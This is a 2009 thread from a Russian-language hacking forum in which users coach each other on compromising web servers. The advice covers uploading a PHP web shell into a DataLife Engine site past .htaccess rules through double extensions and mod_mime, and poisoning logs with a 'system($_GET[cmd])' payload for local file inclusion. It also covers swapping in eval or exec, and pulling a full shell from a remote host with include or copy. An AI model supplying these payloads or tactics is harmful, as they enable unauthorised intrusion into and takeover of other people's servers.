Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    испортил логи терь над ждать пока ошибка исчезнет)
     
  2. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    заливка шела в дле

    Есть доступ к dle админке, версия 7.3.

    Включил возможность добавлять файлы, но к новости так прикрепить и не смог.

    Да и если бы получилось, то насколько я понимаю и проверил, папка /uploads/files/ защищена .htaccess:

    PHP:
    <FilesMatch ".*">
       
    Order allow,deny
       Deny from all
    </FilesMatch>

    <
    FilesMatch "\.(avi|mp3|mp4|flv|swf|wmv)$|^$">
       
    Order deny,allow
       Allow from all
    </FilesMatch>
    Какие есть способы залить шел?
     
  3. okthxnz

    okthxnz Banned

    Joined:
    8 Aug 2009
    Messages:
    15
    Likes Received:
    32
    Reputations:
    0
    Тут вчера сидел в нете и решил перевести WME в яндекс.Деньги
    нашол обменник
    и выбрал случайно не WME а WMU, написал 10 и оплатил, ток потом дошло что я не ту валюту выбрал и кошелька у мну такого нет, при обновлении страницы у мну на яндексе светились деньги, а в WM появился кошелек WMU с 0 денежных средств
    Кто нить вкурсах что это было?
     
    1 person likes this.
  4. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    пробуй shell.php.flv
     
  5. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Можно попробовать закомментировать оставшуюся часть, к примеру на локале у меня такое пашет:
    PHP:
    <?php
    system
    ('dir');
    die();
    /*
    <?php 
    system(; 
    ?>
    Ругается конечно, но работает.
     
    #8405 Qwazar, 12 Aug 2009
    Last edited: 12 Aug 2009
  6. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    А что это даст, он же не будет интерпретироваться как пхп..
     
  7. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    Если апач с mod_mime, то будет
     
  8. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    хорошо, спасибо, попробую.. просто как добавлять новости с файлом я тоже найти не могу..

    Да и ещё там будет номер из цифр пяти-шести перед файлом, его тоже узнать как-то надо. =)

    Ладно, буду пробывать, спасибо за эту инфу.
     
  9. PaCo

    PaCo Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    436
    Likes Received:
    138
    Reputations:
    25
    Наверно стоило бы уточнить что сначало надо соответствуюший AddType(AddHandler) добавить - а то сейчас человека можно запутать.
     
    #8409 PaCo, 12 Aug 2009
    Last edited: 12 Aug 2009
    2 people like this.
  10. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Наоборот, хендлер для .flv НЕ должен быть прописан.
     
  11. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    записал в лог <?php system($_GET[cmd]); ?> хотел копировать в tmp а потом уже инклудить,но опять ошибка))
    Parse error: syntax error, unexpected '['
    как это закомментировать?
     
  12. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Пиши в лог
    PHP:
    <?php system($_GET[cmd]);/*
    Но лучше вместо system - eval, он заработает, если system запрещён.
     
  13. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    уже пробовал eval ,undefind function
    system не запрещен,в логе ls уже выполнилось
     
  14. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Попробуй exec вместо eval.
     
  15. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    это timestamp, запоминай время заливки файла переводи в unixtime и напиши брутер который который этот timestamp подберет, только вот из-за .htaccess наверное ничего не выйдет с шеллом
     
  16. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Насколько я знаю, шестизначный timestamp был еще в 1970 году.
    А сейчас десять знаков в timestamp'e.
     
  17. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    По крайней мере в 6-ой ветке был именно timestamp в качестве префикса
     
    2 people like this.
  18. RazyKK

    RazyKK Member

    Joined:
    9 Feb 2009
    Messages:
    127
    Likes Received:
    16
    Reputations:
    4
    вобщем могу выполнять команды через php include+логи,как можно залить норм шелл?
    <?php include("http://site/nstview.txt"); ?> не прокатило,wget curla нету(смотрел в /bin/)
    если в reffer вставить норм шелл,прокатит?
    _____
    Попробовал через reffer не получилось.Все залил там был wget,лежал не в bin
     
    #8418 RazyKK, 13 Aug 2009
    Last edited: 13 Aug 2009
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    <?php copy('http://site.gov/shell.txt', 'shell.php');?>
     
  20. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    А в какой каталог он скопирует файл? Может надо полный путь указать?
     
Thread Status:
Not open for further replies.